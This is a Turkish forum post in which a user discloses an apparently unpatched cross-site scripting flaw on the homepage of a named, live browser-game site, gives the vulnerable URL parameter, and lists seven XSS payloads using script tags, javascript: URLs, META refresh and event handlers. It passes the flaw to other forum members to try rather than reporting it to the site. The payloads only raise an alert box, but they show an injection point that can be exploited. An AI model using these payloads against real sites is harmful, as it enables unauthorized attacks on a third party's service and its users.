Hoşgeldin Misafir

Tarayıcı Tabanlı Çevrimiçi Oyunda XSS Açığı

f3stu5

15 Eyl 2020
11 Mesaj

Aktiflik

Seviye

Deneyim

TIM / GÖREV:
Tarayıcı tabanlı çevrimiçi oyunun anasayfasında XSS açığı tespit ettim. Benim uğraşacak vaktim olmadığı için, ilgilenenler veya kendini geliştirmek isteyenler için paylaşıyorum. Dilerseniz kendinizdinizde deneyebilirsiniz. 

Açığın bulunduğu url;
Kod:
http://desertorder.com/?r=

XSS asp kodları;

Kod:
"><script>alert('XSS')</script>
"><IMG SRC="javascript:alert('XSS');">
"><META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
"><LINK REL="stylesheet" HREF="javascript:alert('XSS');">
"><DIV STYLE="background-image: url(javascript:alert('XSS'))"
<body onload="javascript:alert('XSS')"></body>
"><table background="javascript:alert('XSS')"></table>

Kolay gelsin.